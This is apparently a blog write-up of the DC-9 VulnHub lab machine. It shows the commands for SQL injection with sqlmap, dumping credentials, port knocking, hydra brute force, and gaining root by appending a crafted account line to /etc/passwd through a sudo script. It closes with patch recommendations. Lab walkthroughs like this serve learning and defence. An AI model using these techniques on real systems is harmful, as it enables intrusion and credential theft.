blog/content/writeup-ctf/writeup-dc-9-vulnhub/index.md

---
title: "Writeup - DC-9 (VulnHub)"
date: 2022-05-10
slug: "writeup-dc-9-vulnhub"
type: "writeup-ctf"
--- 

This is a writeup for the [DC-9](https://www.vulnhub.com/entry/dc-9,412/) machine from the VulnHub site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 192.168.56.101
```
One TCP ports are discovered:

![](img/image-1.webp)

- 80/tcp : HTTP web server (Apache 2.4.38)

![](img/image-2.webp)

## Exploit

At first I start by making a scan of the website folders.

![](img/image-3.webp)

Quite a lot of different pages, I start by making a capture of a request sent by the `search.php` page with the help of Burp.

I then run a SQL vulnerability scan with `sqlmap`.


```bash
sqlmap -r request.txt --dbs --batch
```
The target is usable, I find 3 databases in the result of the command. I start with `users` :

![](img/image-4.webp)

![](img/image-5.webp)

Many different credentials... Looking in the `Staff` database, I find an admin password hash.

![](img/image-6.webp)

So I go on [crackstation](https://crackstation.net/) to try to find it.

![](img/image-7.webp)

I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page `manage.php`, there is an error message : `File does not exist`. I wonder if there is not an argument. After some test I find that there is a `file` argument. This allows me to find the following file:


```bash
File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn 
```
This is a file that allows you to configure port knocking to unblock the SSH port!

So I try to realize the sequence with the following commands:


```bash
nmap -Pn --max-retries 0 -p 7469 192.168.56.101
nmap -Pn --max-retries 0 -p 8475 192.168.56.101
nmap -Pn --max-retries 0 -p 9842 192.168.56.101
```
And indeed it worked, I now have access to the SSH port:

![](img/image-8.webp)

In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with `hydra` :

![](img/image-9.webp)

After a few minutes `hydra` finds several combinations that work. It is by connecting as a `janitor` that I finally find an interesting file:

![](img/image-10.webp)

A list of passwords, so I add them to my existing list and I restart `hydra` :

![](img/image-11.webp)

A new combination is found! So I connect in SSH.

## Privilege escalation

I start by checking the sudo permissions of my user.

![](img/image-12.webp)

By executing the script I understand that it uses two arguments: one in reading and the other in writing.


```bash
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test 
Usage: python test.py read append
```
I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command:


```bash
fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty
$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1
```
I add the line of my user in a temporary file :


```bash
fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt 
d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash
```
Then I add my user with the following command:


```bash
sudo ./test ~/user.txt /etc/passwd
```
Finally I change user:

![](img/image-13.webp)

I now have a root shell on the machine!

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Update the site to avoid SQL injection
- Do not leave an argument `file` if not used
- Do not store clear passwords in a database
- Do not let a script run in root if not necessary